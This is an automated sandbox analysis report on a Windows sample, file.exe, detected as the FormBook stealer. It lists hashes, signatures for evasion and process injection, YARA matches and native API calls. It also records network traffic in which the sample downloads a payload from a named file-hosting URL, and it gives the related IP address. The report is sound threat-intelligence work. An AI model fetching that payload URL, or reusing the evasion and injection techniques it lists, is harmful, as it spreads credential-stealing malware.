Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1562756
MD5:	0a089e934eb856c3e809d0fac53000c7
SHA1:	661f86072031587be18ada0b6606ee82bb52038f
SHA256:	f4e5ec593dcb18dca253d98f5133050e96f27f86c1e46b5882abf797fefe26b1
Tags:	exeuser-Bitsight
Infos:

Detection

FormBook

Score:	88
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected AntiVM3

Yara detected FormBook

.NET source code contains potential unpacker

AI detected suspicious sample

Injects a PE file into a foreign processes

Machine Learning detection for sample

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Yara detected Costura Assembly Loader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if the current process is being debugged

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

file.exe (PID: 1984 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)

file.exe (PID: 528 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A089E934EB856C3E809D0FAC53000C7)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

⊘No configs have been found

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
00000000.00000002.2133396929.0000000006A50000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
Process Memory Space: file.exe PID: 1984	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
Process Memory Space: file.exe PID: 1984	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author
2.2.file.exe.400000.0.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
2.2.file.exe.400000.0.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
0.2.file.exe.6a50000.7.raw.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security

Sigma Signatures

⊘No Sigma rule has matched

Suricata Signatures

⊘No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 21%

Yara detected FormBook

Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49704 version: TLS 1.2

Source: file.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: file.exe, 00000000.00000002.2133930517.0000000006CB0000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000037D4000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000036A1000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: file.exe, file.exe, 00000002.00000002.2217688499.0000000001620000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdbSHA256}Lq source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 069A2192h	0_2_069A1F90
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 069A2192h	0_2_069A1F80
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 069A7FCAh	0_2_069A7F51
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 069A7FCAh	0_2_069A7F60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 069A9C73h	0_2_069A9580
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp 069A7FCAh	0_2_069A8105

Source: global traffic

HTTP traffic detected: GET /ne8lox.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 108.181.20.35 108.181.20.35

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /ne8lox.mp4 HTTP/1.1Host: files.catbox.moeConnection: Keep-Alive

Source: global traffic

DNS traffic detected: DNS query: files.catbox.moe

Source: file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe
Source: file.exe, 00000000.00000002.2111813386.00000000026A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://files.catbox.moe/ne8lox.mp4
Source: file.exe	String found in binary or memory: https://files.catbox.moe/ne8lox.mp41OWRumaBvqxiIWy/UyUzNnQ==
Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2111813386.000000000274A000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: file.exe, 00000000.00000002.2133699660.0000000006B40000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2128950880.000000000393A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown	Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704

Source: unknown

HTTPS traffic detected: 108.181.20.35:443 -> 192.168.2.5:49704 version: TLS 1.2

E-Banking Fraud

Yara detected FormBook

Source: Yara match	File source: 2.2.file.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.file.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2217550179.00000000015C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2216787886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C7728 NtProtectVirtualMemory,	0_2_069C7728
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C9888 NtResumeThread,	0_2_069C9888
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C7720 NtProtectVirtualMemory,	0_2_069C7720
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C9880 NtResumeThread,	0_2_069C9880
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042C7A3 NtClose,	2_2_0042C7A3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692DF0 NtQuerySystemInformation,LdrInitializeThunk,	2_2_01692DF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692C70 NtFreeVirtualMemory,LdrInitializeThunk,	2_2_01692C70
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016935C0 NtCreateMutant,LdrInitializeThunk,	2_2_016935C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01694340 NtSetContextThread,	2_2_01694340
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01694650 NtSuspendThread,	2_2_01694650
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692B60 NtClose,	2_2_01692B60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692BE0 NtQueryValueKey,	2_2_01692BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692BF0 NtAllocateVirtualMemory,	2_2_01692BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692BA0 NtEnumerateValueKey,	2_2_01692BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692B80 NtQueryInformationFile,	2_2_01692B80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692AF0 NtWriteFile,	2_2_01692AF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692AD0 NtReadFile,	2_2_01692AD0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692AB0 NtWaitForSingleObject,	2_2_01692AB0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692D30 NtUnmapViewOfSection,	2_2_01692D30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692D00 NtSetInformationFile,	2_2_01692D00
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692D10 NtMapViewOfSection,	2_2_01692D10
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692DD0 NtDelayExecution,	2_2_01692DD0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692DB0 NtEnumerateKey,	2_2_01692DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692C60 NtCreateKey,	2_2_01692C60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692C00 NtQueryInformationProcess,	2_2_01692C00
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692CF0 NtOpenProcess,	2_2_01692CF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692CC0 NtQueryVirtualMemory,	2_2_01692CC0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692CA0 NtQueryInformationToken,	2_2_01692CA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692F60 NtCreateProcessEx,	2_2_01692F60
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692F30 NtCreateSection,	2_2_01692F30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692FE0 NtCreateFile,	2_2_01692FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692FA0 NtQuerySection,	2_2_01692FA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692FB0 NtResumeThread,	2_2_01692FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692F90 NtProtectVirtualMemory,	2_2_01692F90
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692E30 NtWriteVirtualMemory,	2_2_01692E30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692EE0 NtQueueApcThread,	2_2_01692EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692EA0 NtAdjustPrivilegesToken,	2_2_01692EA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01692E80 NtReadVirtualMemory,	2_2_01692E80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01693010 NtOpenDirectoryObject,	2_2_01693010
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01693090 NtSetValueKey,	2_2_01693090
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016939B0 NtGetContextThread,	2_2_016939B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01693D70 NtOpenThread,	2_2_01693D70
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01693D10 NtOpenProcessToken,	2_2_01693D10

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_024ECFE4	0_2_024ECFE4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_068F07D8	0_2_068F07D8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_068FF368	0_2_068FF368
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06993620	0_2_06993620
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0699B79E	0_2_0699B79E
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0699B6F1	0_2_0699B6F1
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06993610	0_2_06993610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0699C780	0_2_0699C780
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_0699C770	0_2_0699C770
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06992A30	0_2_06992A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06992A40	0_2_06992A40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06992310	0_2_06992310
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06992300	0_2_06992300
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06993B29	0_2_06993B29
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A425D	0_2_069A425D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A7758	0_2_069A7758
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A7F51	0_2_069A7F51
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A7F60	0_2_069A7F60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A6250	0_2_069A6250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A624A	0_2_069A624A
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069A8105	0_2_069A8105
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C4260	0_2_069C4260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C7480	0_2_069C7480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CAA54	0_2_069CAA54
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C4250	0_2_069C4250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CAB1D	0_2_069CAB1D
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CAB35	0_2_069CAB35
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CA750	0_2_069CA750
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CA741	0_2_069CA741
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069C7470	0_2_069C7470
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CADB8	0_2_069CADB8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069CADA9	0_2_069CADA9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069D4CFA	0_2_069D4CFA
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069D666B	0_2_069D666B
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069D39E8	0_2_069D39E8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069D0006	0_2_069D0006
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069D0040	0_2_069D0040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069DA7B8	0_2_069DA7B8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069DA7A8	0_2_069DA7A8
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_069D39D9	0_2_069D39D9
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA35B0	0_2_06CA35B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA0040	0_2_06CA0040
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA1248	0_2_06CA1248
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06CA0367	0_2_06CA0367
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06E4E6C0	0_2_06E4E6C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_06E4E2A0	0_2_06E4E2A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004028C0	2_2_004028C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00410133	2_2_00410133
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_004031D0	2_2_004031D0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00416A2E	2_2_00416A2E
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00416A33	2_2_00416A33
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00410353	2_2_00410353
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0040E3D3	2_2_0040E3D3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_00402530	2_2_00402530
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0042EDD3	2_2_0042EDD3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E8158	2_2_016E8158
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650100	2_2_01650100
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FA118	2_2_016FA118
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017181CC	2_2_017181CC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017141A2	2_2_017141A2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017201AA	2_2_017201AA
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F2000	2_2_016F2000
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171A352	2_2_0171A352
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017203E6	2_2_017203E6
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166E3F0	2_2_0166E3F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700274	2_2_01700274
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016E02C0	2_2_016E02C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660535	2_2_01660535
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01720591	2_2_01720591
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01712446	2_2_01712446
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01704420	2_2_01704420
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170E4F6	2_2_0170E4F6
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660770	2_2_01660770
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01684750	2_2_01684750
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165C7C0	2_2_0165C7C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167C6E0	2_2_0167C6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01676962	2_2_01676962
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016629A0	2_2_016629A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0172A9A6	2_2_0172A9A6
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01662840	2_2_01662840
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166A840	2_2_0166A840
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0168E8F0	2_2_0168E8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016468B8	2_2_016468B8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171AB40	2_2_0171AB40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01716BD7	2_2_01716BD7
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165EA80	2_2_0165EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166AD00	2_2_0166AD00
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FCD1F	2_2_016FCD1F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0165ADE0	2_2_0165ADE0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01678DBF	2_2_01678DBF
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660C00	2_2_01660C00
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01650CF2	2_2_01650CF2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01700CB5	2_2_01700CB5
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D4F40	2_2_016D4F40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01702F30	2_2_01702F30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016A2F28	2_2_016A2F28
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01680F30	2_2_01680F30
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166CFE0	2_2_0166CFE0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01652FC8	2_2_01652FC8
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016DEFA0	2_2_016DEFA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01660E59	2_2_01660E59
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171EE26	2_2_0171EE26
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171EEDB	2_2_0171EEDB
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171CE93	2_2_0171CE93
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01672E90	2_2_01672E90
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0169516C	2_2_0169516C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164F172	2_2_0164F172
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0172B16B	2_2_0172B16B
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0166B1B0	2_2_0166B1B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171F0E0	2_2_0171F0E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017170E9	2_2_017170E9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016670C0	2_2_016670C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170F0CC	2_2_0170F0CC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0164D34C	2_2_0164D34C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171132D	2_2_0171132D
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016A739A	2_2_016A739A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017012ED	2_2_017012ED
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167B2C0	2_2_0167B2C0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016652A0	2_2_016652A0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01717571	2_2_01717571
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FD5B0	2_2_016FD5B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01651460	2_2_01651460
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171F43F	2_2_0171F43F
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171F7B0	2_2_0171F7B0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_017116CC	2_2_017116CC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01669950	2_2_01669950
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167B950	2_2_0167B950
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016F5910	2_2_016F5910
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016CD800	2_2_016CD800
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016638E0	2_2_016638E0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171FB76	2_2_0171FB76
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0169DBF9	2_2_0169DBF9
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D5BF0	2_2_016D5BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167FB80	2_2_0167FB80
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D3A6C	2_2_016D3A6C
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01717A46	2_2_01717A46
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171FA49	2_2_0171FA49
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0170DAC6	2_2_0170DAC6
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016FDAAC	2_2_016FDAAC
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016A5AA0	2_2_016A5AA0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01701AA3	2_2_01701AA3
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01717D73	2_2_01717D73
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01663D40	2_2_01663D40
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01711D5A	2_2_01711D5A
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0167FDC0	2_2_0167FDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_016D9C32	2_2_016D9C32
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171FCF2	2_2_0171FCF2
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171FF09	2_2_0171FF09
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_0171FFB1	2_2_0171FFB1
Source: C:\Users\user\Desktop\file.exe	Code function: 2_2_01661F92	2_2_01661F92
